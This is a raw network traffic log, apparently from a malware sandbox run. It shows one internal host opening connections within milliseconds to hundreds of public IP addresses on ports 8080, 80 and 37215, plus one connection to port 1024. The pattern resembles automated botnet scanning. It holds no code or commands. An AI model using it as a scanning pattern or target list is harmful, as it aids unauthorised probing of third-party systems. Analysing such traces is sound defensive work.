Nov 22, 2023 08:37:48.403986931 CET	54329	8080	192.168.2.23	85.211.78.224
Nov 22, 2023 08:37:48.404000998 CET	54329	8080	192.168.2.23	95.19.202.70
Nov 22, 2023 08:37:48.404000998 CET	54329	8080	192.168.2.23	94.216.185.189
Nov 22, 2023 08:37:48.404002905 CET	54329	8080	192.168.2.23	62.254.236.39
Nov 22, 2023 08:37:48.404010057 CET	54329	8080	192.168.2.23	95.205.209.122
Nov 22, 2023 08:37:48.404010057 CET	54329	8080	192.168.2.23	95.116.51.169
Nov 22, 2023 08:37:48.404022932 CET	54329	8080	192.168.2.23	95.30.103.139
Nov 22, 2023 08:37:48.404027939 CET	54329	8080	192.168.2.23	31.252.98.25
Nov 22, 2023 08:37:48.404036999 CET	54329	8080	192.168.2.23	95.224.206.213
Nov 22, 2023 08:37:48.404038906 CET	54329	8080	192.168.2.23	85.130.169.166
Nov 22, 2023 08:37:48.404047012 CET	54329	8080	192.168.2.23	62.235.236.229
Nov 22, 2023 08:37:48.404050112 CET	54329	8080	192.168.2.23	31.109.163.196
Nov 22, 2023 08:37:48.404057980 CET	54329	8080	192.168.2.23	85.124.193.117
Nov 22, 2023 08:37:48.404058933 CET	54329	8080	192.168.2.23	94.54.57.168
Nov 22, 2023 08:37:48.404066086 CET	54329	8080	192.168.2.23	95.186.217.49
Nov 22, 2023 08:37:48.404081106 CET	54329	8080	192.168.2.23	85.77.141.132
Nov 22, 2023 08:37:48.404082060 CET	54329	8080	192.168.2.23	62.120.4.139
Nov 22, 2023 08:37:48.404087067 CET	54329	8080	192.168.2.23	95.116.185.220
Nov 22, 2023 08:37:48.404092073 CET	54329	8080	192.168.2.23	62.74.142.78
Nov 22, 2023 08:37:48.404103994 CET	54329	8080	192.168.2.23	95.162.44.213
Nov 22, 2023 08:37:48.404108047 CET	54329	8080	192.168.2.23	94.44.233.114
Nov 22, 2023 08:37:48.404128075 CET	54329	8080	192.168.2.23	31.129.40.92
Nov 22, 2023 08:37:48.404128075 CET	54329	8080	192.168.2.23	62.122.2.122
Nov 22, 2023 08:37:48.404128075 CET	54329	8080	192.168.2.23	62.83.150.247
Nov 22, 2023 08:37:48.404129982 CET	54329	8080	192.168.2.23	85.113.117.98
Nov 22, 2023 08:37:48.404134989 CET	54329	8080	192.168.2.23	94.192.54.161
Nov 22, 2023 08:37:48.404148102 CET	54329	8080	192.168.2.23	85.10.72.76
Nov 22, 2023 08:37:48.404148102 CET	54329	8080	192.168.2.23	62.110.229.28
Nov 22, 2023 08:37:48.404603958 CET	54329	8080	192.168.2.23	85.67.55.101
Nov 22, 2023 08:37:48.404603958 CET	54329	8080	192.168.2.23	85.32.242.15
Nov 22, 2023 08:37:48.404603958 CET	54329	8080	192.168.2.23	85.93.107.139
Nov 22, 2023 08:37:48.404604912 CET	54329	8080	192.168.2.23	95.79.113.202
Nov 22, 2023 08:37:48.404604912 CET	54329	8080	192.168.2.23	62.66.153.223
Nov 22, 2023 08:37:48.404619932 CET	54329	8080	192.168.2.23	95.45.231.205
Nov 22, 2023 08:37:48.404619932 CET	54329	8080	192.168.2.23	95.34.7.220
Nov 22, 2023 08:37:48.404620886 CET	54329	8080	192.168.2.23	94.146.228.164
Nov 22, 2023 08:37:48.404619932 CET	54329	8080	192.168.2.23	31.136.79.130
Nov 22, 2023 08:37:48.404620886 CET	54329	8080	192.168.2.23	31.144.161.208
Nov 22, 2023 08:37:48.404620886 CET	54329	8080	192.168.2.23	85.45.103.228
Nov 22, 2023 08:37:48.404624939 CET	54329	8080	192.168.2.23	31.91.23.149
Nov 22, 2023 08:37:48.404625893 CET	54329	8080	192.168.2.23	85.129.187.43
Nov 22, 2023 08:37:48.404628038 CET	54329	8080	192.168.2.23	85.242.164.218
Nov 22, 2023 08:37:48.404628038 CET	54329	8080	192.168.2.23	62.58.123.36
Nov 22, 2023 08:37:48.404628038 CET	54329	8080	192.168.2.23	95.202.49.149
Nov 22, 2023 08:37:48.404628038 CET	54329	8080	192.168.2.23	62.25.222.136
Nov 22, 2023 08:37:48.404664993 CET	54329	8080	192.168.2.23	31.151.202.213
Nov 22, 2023 08:37:48.404664993 CET	54329	8080	192.168.2.23	94.56.160.162
Nov 22, 2023 08:37:48.404666901 CET	54329	8080	192.168.2.23	85.1.90.174
Nov 22, 2023 08:37:48.404666901 CET	54329	8080	192.168.2.23	85.61.37.214
Nov 22, 2023 08:37:48.404669046 CET	54329	8080	192.168.2.23	62.132.18.166
Nov 22, 2023 08:37:48.404674053 CET	54329	8080	192.168.2.23	31.150.46.126
Nov 22, 2023 08:37:48.404674053 CET	54329	8080	192.168.2.23	94.74.241.217
Nov 22, 2023 08:37:48.404676914 CET	54329	8080	192.168.2.23	62.42.50.79
Nov 22, 2023 08:37:48.404678106 CET	54329	8080	192.168.2.23	95.152.246.9
Nov 22, 2023 08:37:48.404678106 CET	54329	8080	192.168.2.23	31.25.239.0
Nov 22, 2023 08:37:48.404685974 CET	54329	8080	192.168.2.23	95.241.187.8
Nov 22, 2023 08:37:48.404685974 CET	54329	8080	192.168.2.23	62.24.184.75
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	94.128.25.117
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	94.235.89.37
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	94.174.168.209
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	62.134.67.149
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	95.159.187.84
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	62.29.251.226
Nov 22, 2023 08:37:48.404706955 CET	54329	8080	192.168.2.23	31.208.226.111
Nov 22, 2023 08:37:48.404716969 CET	54329	8080	192.168.2.23	85.29.27.97
Nov 22, 2023 08:37:48.404717922 CET	54329	8080	192.168.2.23	62.163.13.129
Nov 22, 2023 08:37:48.404727936 CET	54329	8080	192.168.2.23	94.196.188.183
Nov 22, 2023 08:37:48.404732943 CET	54329	8080	192.168.2.23	31.235.112.113
Nov 22, 2023 08:37:48.404732943 CET	54329	8080	192.168.2.23	62.76.195.5
Nov 22, 2023 08:37:48.404736042 CET	54329	8080	192.168.2.23	31.235.152.9
Nov 22, 2023 08:37:48.404736042 CET	54329	8080	192.168.2.23	94.116.213.177
Nov 22, 2023 08:37:48.404736996 CET	54329	8080	192.168.2.23	94.120.173.248
Nov 22, 2023 08:37:48.404755116 CET	54329	8080	192.168.2.23	62.38.186.212
Nov 22, 2023 08:37:48.404755116 CET	54329	8080	192.168.2.23	62.98.201.28
Nov 22, 2023 08:37:48.404777050 CET	54329	8080	192.168.2.23	31.137.191.110
Nov 22, 2023 08:37:48.404777050 CET	54329	8080	192.168.2.23	62.134.149.86
Nov 22, 2023 08:37:48.404778004 CET	54329	8080	192.168.2.23	31.242.134.150
Nov 22, 2023 08:37:48.404777050 CET	54329	8080	192.168.2.23	94.138.86.66
Nov 22, 2023 08:37:48.404777050 CET	54329	8080	192.168.2.23	85.219.53.36
Nov 22, 2023 08:37:48.404777050 CET	54329	8080	192.168.2.23	31.245.39.144
Nov 22, 2023 08:37:48.404778957 CET	54329	8080	192.168.2.23	31.139.192.12
Nov 22, 2023 08:37:48.404778957 CET	54329	8080	192.168.2.23	95.139.40.26
Nov 22, 2023 08:37:48.404781103 CET	54329	8080	192.168.2.23	85.47.124.74
Nov 22, 2023 08:37:48.404781103 CET	54329	8080	192.168.2.23	31.5.181.147
Nov 22, 2023 08:37:48.404781103 CET	54329	8080	192.168.2.23	85.210.86.35
Nov 22, 2023 08:37:48.404781103 CET	54329	8080	192.168.2.23	31.73.229.135
Nov 22, 2023 08:37:48.404781103 CET	54329	8080	192.168.2.23	31.34.145.124
Nov 22, 2023 08:37:48.404788017 CET	54329	8080	192.168.2.23	95.142.247.129
Nov 22, 2023 08:37:48.404795885 CET	54329	8080	192.168.2.23	85.122.68.214
Nov 22, 2023 08:37:48.404803038 CET	54329	8080	192.168.2.23	31.209.250.207
Nov 22, 2023 08:37:48.404803991 CET	54329	8080	192.168.2.23	85.96.48.117
Nov 22, 2023 08:37:48.404803991 CET	54329	8080	192.168.2.23	31.24.69.162
Nov 22, 2023 08:37:48.404803991 CET	54329	8080	192.168.2.23	95.217.87.87
Nov 22, 2023 08:37:48.404803991 CET	54329	8080	192.168.2.23	31.192.226.79
Nov 22, 2023 08:37:48.404803991 CET	54329	8080	192.168.2.23	95.11.62.165
Nov 22, 2023 08:37:48.404805899 CET	54329	8080	192.168.2.23	94.187.151.185
Nov 22, 2023 08:37:48.404814005 CET	54329	8080	192.168.2.23	62.34.74.152
Nov 22, 2023 08:37:48.404814005 CET	54329	8080	192.168.2.23	62.116.78.226
Nov 22, 2023 08:37:48.404814005 CET	54329	8080	192.168.2.23	62.34.29.2
Nov 22, 2023 08:37:48.404814005 CET	54329	8080	192.168.2.23	94.245.62.232
Nov 22, 2023 08:37:48.404824018 CET	54329	8080	192.168.2.23	94.24.190.131
Nov 22, 2023 08:37:48.404836893 CET	54329	8080	192.168.2.23	62.175.172.124
Nov 22, 2023 08:37:48.404836893 CET	54329	8080	192.168.2.23	31.206.137.141
Nov 22, 2023 08:37:48.404836893 CET	54329	8080	192.168.2.23	94.3.150.188
Nov 22, 2023 08:37:48.404836893 CET	54329	8080	192.168.2.23	85.41.201.21
Nov 22, 2023 08:37:48.404836893 CET	54329	8080	192.168.2.23	62.155.111.105
Nov 22, 2023 08:37:48.404849052 CET	54329	8080	192.168.2.23	62.97.159.48
Nov 22, 2023 08:37:48.404849052 CET	54329	8080	192.168.2.23	94.80.1.61
Nov 22, 2023 08:37:48.404849052 CET	54329	8080	192.168.2.23	94.220.241.181
Nov 22, 2023 08:37:48.404851913 CET	54329	8080	192.168.2.23	31.144.162.16
Nov 22, 2023 08:37:48.404870033 CET	54329	8080	192.168.2.23	94.45.212.130
Nov 22, 2023 08:37:48.404988050 CET	54329	8080	192.168.2.23	95.224.142.253
Nov 22, 2023 08:37:48.404988050 CET	54329	8080	192.168.2.23	85.241.158.183
Nov 22, 2023 08:37:48.404988050 CET	54329	8080	192.168.2.23	94.1.36.175
Nov 22, 2023 08:37:48.404989958 CET	54329	8080	192.168.2.23	94.89.121.82
Nov 22, 2023 08:37:48.404994965 CET	54329	8080	192.168.2.23	62.109.6.215
Nov 22, 2023 08:37:48.405003071 CET	54329	8080	192.168.2.23	94.70.207.189
Nov 22, 2023 08:37:48.405009031 CET	54329	8080	192.168.2.23	95.23.89.121
Nov 22, 2023 08:37:48.405073881 CET	54329	8080	192.168.2.23	31.70.113.235
Nov 22, 2023 08:37:48.405082941 CET	54329	8080	192.168.2.23	31.225.232.246
Nov 22, 2023 08:37:48.405086040 CET	54329	8080	192.168.2.23	94.195.71.33
Nov 22, 2023 08:37:48.405086040 CET	54329	8080	192.168.2.23	31.164.60.115
Nov 22, 2023 08:37:48.405090094 CET	54329	8080	192.168.2.23	94.186.109.49
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	62.25.137.241
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	95.222.37.226
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	95.194.34.10
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	31.248.60.193
Nov 22, 2023 08:37:48.405105114 CET	54329	8080	192.168.2.23	95.26.100.238
Nov 22, 2023 08:37:48.405102968 CET	54329	8080	192.168.2.23	95.127.237.194
Nov 22, 2023 08:37:48.405105114 CET	54329	8080	192.168.2.23	31.69.168.26
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	95.55.182.215
Nov 22, 2023 08:37:48.405102968 CET	54329	8080	192.168.2.23	62.44.62.104
Nov 22, 2023 08:37:48.405102015 CET	54329	8080	192.168.2.23	31.249.236.201
Nov 22, 2023 08:37:48.405105114 CET	54329	8080	192.168.2.23	85.219.137.46
Nov 22, 2023 08:37:48.405105114 CET	54329	8080	192.168.2.23	95.134.67.176
Nov 22, 2023 08:37:48.405105114 CET	54329	8080	192.168.2.23	31.242.238.224
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	94.43.202.176
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	94.188.204.23
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	62.10.213.196
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	85.239.86.53
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	31.42.97.156
Nov 22, 2023 08:37:48.405122995 CET	54329	8080	192.168.2.23	95.146.137.58
Nov 22, 2023 08:37:48.405128956 CET	54329	8080	192.168.2.23	95.68.114.90
Nov 22, 2023 08:37:48.405128956 CET	54329	8080	192.168.2.23	94.107.199.37
Nov 22, 2023 08:37:48.405128956 CET	54329	8080	192.168.2.23	95.181.141.175
Nov 22, 2023 08:37:48.405128956 CET	54329	8080	192.168.2.23	31.185.86.227
Nov 22, 2023 08:37:48.405128956 CET	54329	8080	192.168.2.23	94.110.81.128
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	31.152.111.194
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	31.145.253.118
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	95.62.42.237
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	62.182.162.216
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	95.60.97.222
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	31.246.69.42
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	85.126.245.64
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	62.87.172.85
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	62.99.178.199
Nov 22, 2023 08:37:48.405132055 CET	54329	8080	192.168.2.23	94.72.45.171
Nov 22, 2023 08:37:48.405138016 CET	54329	8080	192.168.2.23	94.83.165.160
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	94.249.48.151
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	94.150.66.213
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	85.147.175.194
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	31.65.7.175
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	94.250.189.200
Nov 22, 2023 08:37:48.405138969 CET	54329	8080	192.168.2.23	95.187.13.231
Nov 22, 2023 08:37:48.405141115 CET	54329	8080	192.168.2.23	94.99.228.43
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	95.145.189.54
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	85.153.215.45
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	85.32.115.140
Nov 22, 2023 08:37:48.405153990 CET	54329	8080	192.168.2.23	95.44.93.198
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	31.53.233.251
Nov 22, 2023 08:37:48.405153990 CET	54329	8080	192.168.2.23	95.183.219.176
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	62.21.149.26
Nov 22, 2023 08:37:48.405153990 CET	54329	8080	192.168.2.23	94.198.225.26
Nov 22, 2023 08:37:48.405153036 CET	54329	8080	192.168.2.23	62.243.8.249
Nov 22, 2023 08:37:48.405153990 CET	54329	8080	192.168.2.23	85.61.132.116
Nov 22, 2023 08:37:48.405174017 CET	54329	8080	192.168.2.23	95.179.183.46
Nov 22, 2023 08:37:48.405174017 CET	54329	8080	192.168.2.23	95.191.200.247
Nov 22, 2023 08:37:48.405174017 CET	54329	8080	192.168.2.23	31.118.226.175
Nov 22, 2023 08:37:48.405174017 CET	54329	8080	192.168.2.23	94.12.191.247
Nov 22, 2023 08:37:48.405181885 CET	54329	8080	192.168.2.23	94.152.21.146
Nov 22, 2023 08:37:48.405190945 CET	54329	8080	192.168.2.23	95.180.33.89
Nov 22, 2023 08:37:48.405201912 CET	54329	8080	192.168.2.23	31.65.110.62
Nov 22, 2023 08:37:48.405204058 CET	54329	8080	192.168.2.23	62.229.150.104
Nov 22, 2023 08:37:48.405204058 CET	54329	8080	192.168.2.23	62.196.24.197
Nov 22, 2023 08:37:48.405205965 CET	54329	8080	192.168.2.23	85.159.68.120
Nov 22, 2023 08:37:48.405205965 CET	54329	8080	192.168.2.23	31.120.242.160
Nov 22, 2023 08:37:48.405205965 CET	54329	8080	192.168.2.23	31.201.175.26
Nov 22, 2023 08:37:48.405205965 CET	54329	8080	192.168.2.23	62.157.32.13
Nov 22, 2023 08:37:48.405211926 CET	54329	8080	192.168.2.23	95.247.33.173
Nov 22, 2023 08:37:48.405214071 CET	54329	8080	192.168.2.23	31.159.233.132
Nov 22, 2023 08:37:48.405214071 CET	54329	8080	192.168.2.23	94.113.216.203
Nov 22, 2023 08:37:48.405219078 CET	54329	8080	192.168.2.23	31.202.87.215
Nov 22, 2023 08:37:48.405297041 CET	54329	8080	192.168.2.23	31.42.102.65
Nov 22, 2023 08:37:48.405297995 CET	54329	8080	192.168.2.23	62.17.105.200
Nov 22, 2023 08:37:48.405297995 CET	54329	8080	192.168.2.23	31.153.150.1
Nov 22, 2023 08:37:48.405297995 CET	54329	8080	192.168.2.23	85.189.32.147
Nov 22, 2023 08:37:48.405297995 CET	54329	8080	192.168.2.23	62.242.170.191
Nov 22, 2023 08:37:48.405298948 CET	54329	8080	192.168.2.23	85.166.75.180
Nov 22, 2023 08:37:48.405298948 CET	54329	8080	192.168.2.23	85.54.189.231
Nov 22, 2023 08:37:48.405298948 CET	54329	8080	192.168.2.23	95.202.7.202
Nov 22, 2023 08:37:48.405313015 CET	54329	8080	192.168.2.23	85.43.80.195
Nov 22, 2023 08:37:48.405313015 CET	54329	8080	192.168.2.23	31.203.69.245
Nov 22, 2023 08:37:48.405313969 CET	54329	8080	192.168.2.23	85.151.219.232
Nov 22, 2023 08:37:48.405314922 CET	54329	8080	192.168.2.23	85.107.90.145
Nov 22, 2023 08:37:48.405314922 CET	54329	8080	192.168.2.23	94.65.121.2
Nov 22, 2023 08:37:48.405318022 CET	54329	8080	192.168.2.23	31.29.190.173
Nov 22, 2023 08:37:48.405318022 CET	54329	8080	192.168.2.23	94.54.152.122
Nov 22, 2023 08:37:48.405318022 CET	54329	8080	192.168.2.23	31.183.97.73
Nov 22, 2023 08:37:48.405335903 CET	54329	8080	192.168.2.23	31.197.107.235
Nov 22, 2023 08:37:48.405335903 CET	54329	8080	192.168.2.23	94.224.46.127
Nov 22, 2023 08:37:48.405335903 CET	54329	8080	192.168.2.23	31.3.157.74
Nov 22, 2023 08:37:48.405354023 CET	54329	8080	192.168.2.23	85.125.173.202
Nov 22, 2023 08:37:48.405354023 CET	54329	8080	192.168.2.23	62.213.120.65
Nov 22, 2023 08:37:48.405354023 CET	54329	8080	192.168.2.23	62.76.146.178
Nov 22, 2023 08:37:48.405354023 CET	54329	8080	192.168.2.23	62.148.23.101
Nov 22, 2023 08:37:48.407881975 CET	52264	1024	192.168.2.23	141.98.10.26
Nov 22, 2023 08:37:48.409953117 CET	54328	80	192.168.2.23	88.202.119.94
Nov 22, 2023 08:37:48.410002947 CET	54328	80	192.168.2.23	88.225.255.94
Nov 22, 2023 08:37:48.410027027 CET	54328	80	192.168.2.23	88.153.108.104
Nov 22, 2023 08:37:48.410056114 CET	54328	80	192.168.2.23	88.109.163.137
Nov 22, 2023 08:37:48.410069942 CET	54328	80	192.168.2.23	88.219.218.109
Nov 22, 2023 08:37:48.410092115 CET	54328	80	192.168.2.23	88.108.218.18
Nov 22, 2023 08:37:48.410125971 CET	54328	80	192.168.2.23	88.6.60.111
Nov 22, 2023 08:37:48.410146952 CET	54328	80	192.168.2.23	88.137.73.24
Nov 22, 2023 08:37:48.410165071 CET	54328	80	192.168.2.23	88.178.159.113
Nov 22, 2023 08:37:48.410183907 CET	54328	80	192.168.2.23	88.35.145.122
Nov 22, 2023 08:37:48.410197020 CET	54328	80	192.168.2.23	88.38.171.251
Nov 22, 2023 08:37:48.410249949 CET	54328	80	192.168.2.23	88.79.240.237
Nov 22, 2023 08:37:48.410264015 CET	54328	80	192.168.2.23	88.39.169.121
Nov 22, 2023 08:37:48.410286903 CET	54328	80	192.168.2.23	88.116.249.159
Nov 22, 2023 08:37:48.410326004 CET	54328	80	192.168.2.23	88.44.24.26
Nov 22, 2023 08:37:48.410353899 CET	54328	80	192.168.2.23	88.148.36.229
Nov 22, 2023 08:37:48.410377026 CET	54328	80	192.168.2.23	88.57.128.109
Nov 22, 2023 08:37:48.410377026 CET	54328	80	192.168.2.23	88.48.9.50
Nov 22, 2023 08:37:48.410410881 CET	54328	80	192.168.2.23	88.162.8.92
Nov 22, 2023 08:37:48.410453081 CET	54328	80	192.168.2.23	88.96.147.177
Nov 22, 2023 08:37:48.410491943 CET	54328	80	192.168.2.23	88.84.193.202
Nov 22, 2023 08:37:48.410492897 CET	54328	80	192.168.2.23	88.0.174.220
Nov 22, 2023 08:37:48.410511971 CET	54328	80	192.168.2.23	88.196.49.72
Nov 22, 2023 08:37:48.410521984 CET	54328	80	192.168.2.23	88.84.76.130
Nov 22, 2023 08:37:48.410553932 CET	54328	80	192.168.2.23	88.99.163.23
Nov 22, 2023 08:37:48.410625935 CET	54328	80	192.168.2.23	88.68.183.142
Nov 22, 2023 08:37:48.410628080 CET	54328	80	192.168.2.23	88.178.50.46
Nov 22, 2023 08:37:48.410628080 CET	54328	80	192.168.2.23	88.211.189.164
Nov 22, 2023 08:37:48.410645962 CET	54328	80	192.168.2.23	88.124.141.34
Nov 22, 2023 08:37:48.410670996 CET	54328	80	192.168.2.23	88.129.77.246
Nov 22, 2023 08:37:48.410682917 CET	54328	80	192.168.2.23	88.166.199.100
Nov 22, 2023 08:37:48.410686970 CET	54328	80	192.168.2.23	88.172.32.106
Nov 22, 2023 08:37:48.410708904 CET	54328	80	192.168.2.23	88.238.240.147
Nov 22, 2023 08:37:48.410770893 CET	54328	80	192.168.2.23	88.115.77.138
Nov 22, 2023 08:37:48.410832882 CET	54328	80	192.168.2.23	88.81.75.53
Nov 22, 2023 08:37:48.410836935 CET	54328	80	192.168.2.23	88.52.75.151
Nov 22, 2023 08:37:48.410862923 CET	54328	80	192.168.2.23	88.182.214.183
Nov 22, 2023 08:37:48.410906076 CET	54328	80	192.168.2.23	88.151.184.70
Nov 22, 2023 08:37:48.410906076 CET	54328	80	192.168.2.23	88.175.79.86
Nov 22, 2023 08:37:48.410907030 CET	54328	80	192.168.2.23	88.69.203.187
Nov 22, 2023 08:37:48.410926104 CET	54328	80	192.168.2.23	88.106.10.177
Nov 22, 2023 08:37:48.410965919 CET	54328	80	192.168.2.23	88.170.87.228
Nov 22, 2023 08:37:48.410969973 CET	54328	80	192.168.2.23	88.41.204.83
Nov 22, 2023 08:37:48.410980940 CET	54328	80	192.168.2.23	88.67.225.51
Nov 22, 2023 08:37:48.411004066 CET	54328	80	192.168.2.23	88.242.127.27
Nov 22, 2023 08:37:48.411020994 CET	54328	80	192.168.2.23	88.168.102.186
Nov 22, 2023 08:37:48.411041975 CET	54328	80	192.168.2.23	88.51.59.32
Nov 22, 2023 08:37:48.411853075 CET	54335	37215	192.168.2.23	157.242.119.94
Nov 22, 2023 08:37:48.411899090 CET	54335	37215	192.168.2.23	157.217.255.94
Nov 22, 2023 08:37:48.411916018 CET	54335	37215	192.168.2.23	157.160.172.105
Nov 22, 2023 08:37:48.411936045 CET	54335	37215	192.168.2.23	157.135.57.94
Nov 22, 2023 08:37:48.412005901 CET	54335	37215	192.168.2.23	157.1.73.143
Nov 22, 2023 08:37:48.412009001 CET	54335	37215	192.168.2.23	157.79.254.98
Nov 22, 2023 08:37:48.412019968 CET	54335	37215	192.168.2.23	157.138.201.132
Nov 22, 2023 08:37:48.412033081 CET	54335	37215	192.168.2.23	157.176.137.25
Nov 22, 2023 08:37:48.412066936 CET	54335	37215	192.168.2.23	157.81.17.123
Nov 22, 2023 08:37:48.412075043 CET	54335	37215	192.168.2.23	157.76.12.108
Nov 22, 2023 08:37:48.412091017 CET	54335	37215	192.168.2.23	157.119.215.104
Nov 22, 2023 08:37:48.412120104 CET	54335	37215	192.168.2.23	157.184.81.220
Nov 22, 2023 08:37:48.412163973 CET	54335	37215	192.168.2.23	157.76.136.212
Nov 22, 2023 08:37:48.412201881 CET	54335	37215	192.168.2.23	157.27.56.82
Nov 22, 2023 08:37:48.412213087 CET	54335	37215	192.168.2.23	157.235.51.109
Nov 22, 2023 08:37:48.412359953 CET	54335	37215	192.168.2.23	157.69.109.20
Nov 22, 2023 08:37:48.412367105 CET	54335	37215	192.168.2.23	157.74.64.83
Nov 22, 2023 08:37:48.412368059 CET	54335	37215	192.168.2.23	157.81.233.69
Nov 22, 2023 08:37:48.412384987 CET	54335	37215	192.168.2.23	157.253.23.75
Nov 22, 2023 08:37:48.412444115 CET	54335	37215	192.168.2.23	157.215.243.151
Nov 22, 2023 08:37:48.412461996 CET	54335	37215	192.168.2.23	157.69.9.209
Nov 22, 2023 08:37:48.412482977 CET	54335	37215	192.168.2.23	157.63.26.114
Nov 22, 2023 08:37:48.412499905 CET	54335	37215	192.168.2.23	157.44.20.228
Nov 22, 2023 08:37:48.412580013 CET	54335	37215	192.168.2.23	157.191.150.209
Nov 22, 2023 08:37:48.412596941 CET	54335	37215	192.168.2.23	157.166.57.141
Nov 22, 2023 08:37:48.412630081 CET	54335	37215	192.168.2.23	157.141.57.252
Nov 22, 2023 08:37:48.412648916 CET	54335	37215	192.168.2.23	157.14.168.195
Nov 22, 2023 08:37:48.412661076 CET	54335	37215	192.168.2.23	157.190.78.0
Nov 22, 2023 08:37:48.412678003 CET	54335	37215	192.168.2.23	157.98.101.109
Nov 22, 2023 08:37:48.412695885 CET	54335	37215	192.168.2.23	157.133.163.87
Nov 22, 2023 08:37:48.412714958 CET	54335	37215	192.168.2.23	157.135.40.150
Nov 22, 2023 08:37:48.412739992 CET	54335	37215	192.168.2.23	157.121.134.208
Nov 22, 2023 08:37:48.412759066 CET	54335	37215	192.168.2.23	157.67.62.146
Nov 22, 2023 08:37:48.412791014 CET	54335	37215	192.168.2.23	157.86.174.183
Nov 22, 2023 08:37:48.412815094 CET	54335	37215	192.168.2.23	157.219.27.159
Nov 22, 2023 08:37:48.412847996 CET	54335	37215	192.168.2.23	157.151.68.81
Nov 22, 2023 08:37:48.412874937 CET	54335	37215	192.168.2.23	157.242.25.67
Nov 22, 2023 08:37:48.412911892 CET	54335	37215	192.168.2.23	157.164.152.11
Nov 22, 2023 08:37:48.412923098 CET	54335	37215	192.168.2.23	157.236.228.72
Nov 22, 2023 08:37:48.412931919 CET	54335	37215	192.168.2.23	157.117.153.224
Nov 22, 2023 08:37:48.413002014 CET	54328	80	192.168.2.23	88.167.214.29
Nov 22, 2023 08:37:48.413053036 CET	54328	80	192.168.2.23	88.118.129.228
Nov 22, 2023 08:37:48.413093090 CET	54328	80	192.168.2.23	88.165.125.161
Nov 22, 2023 08:37:48.413131952 CET	54328	80	192.168.2.23	88.154.128.136
Nov 22, 2023 08:37:48.413134098 CET	54328	80	192.168.2.23	88.3.54.183
Nov 22, 2023 08:37:48.413151026 CET	54328	80	192.168.2.23	88.137.77.8
Nov 22, 2023 08:37:48.413163900 CET	54328	80	192.168.2.23	88.8.207.116
Nov 22, 2023 08:37:48.413187027 CET	54328	80	192.168.2.23	88.1.143.44
Nov 22, 2023 08:37:48.413202047 CET	54328	80	192.168.2.23	88.236.93.47
Nov 22, 2023 08:37:48.413222075 CET	54328	80	192.168.2.23	88.157.56.89
Nov 22, 2023 08:37:48.413297892 CET	54328	80	192.168.2.23	88.82.204.186
Nov 22, 2023 08:37:48.413301945 CET	54328	80	192.168.2.23	88.188.150.186
Nov 22, 2023 08:37:48.413301945 CET	54328	80	192.168.2.23	88.2.135.4
Nov 22, 2023 08:37:48.413341999 CET	54328	80	192.168.2.23	88.8.42.52
Nov 22, 2023 08:37:48.413355112 CET	54328	80	192.168.2.23	88.237.63.134
Nov 22, 2023 08:37:48.413361073 CET	54328	80	192.168.2.23	88.219.227.151
Nov 22, 2023 08:37:48.413393974 CET	54328	80	192.168.2.23	88.249.136.218
Nov 22, 2023 08:37:48.413405895 CET	54328	80	192.168.2.23	88.228.19.203
Nov 22, 2023 08:37:48.413503885 CET	54328	80	192.168.2.23	88.57.233.133
Nov 22, 2023 08:37:48.413506031 CET	54328	80	192.168.2.23	88.92.78.215
Nov 22, 2023 08:37:48.413516045 CET	54328	80	192.168.2.23	88.6.121.174
Nov 22, 2023 08:37:48.413516045 CET	54328	80	192.168.2.23	88.93.194.159
Nov 22, 2023 08:37:48.413536072 CET	54328	80	192.168.2.23	88.178.97.140
Nov 22, 2023 08:37:48.413557053 CET	54328	80	192.168.2.23	88.244.56.64
Nov 22, 2023 08:37:48.413562059 CET	54328	80	192.168.2.23	88.222.71.206
Nov 22, 2023 08:37:48.413583994 CET	54328	80	192.168.2.23	88.102.186.138
Nov 22, 2023 08:37:48.413602114 CET	54328	80	192.168.2.23	88.100.207.188
Nov 22, 2023 08:37:48.413638115 CET	54328	80	192.168.2.23	88.71.139.71
Nov 22, 2023 08:37:48.413710117 CET	54328	80	192.168.2.23	88.223.60.139
Nov 22, 2023 08:37:48.413728952 CET	54328	80	192.168.2.23	88.214.224.103
Nov 22, 2023 08:37:48.413754940 CET	54328	80	192.168.2.23	88.218.88.149
Nov 22, 2023 08:37:48.413778067 CET	54328	80	192.168.2.23	88.200.212.104
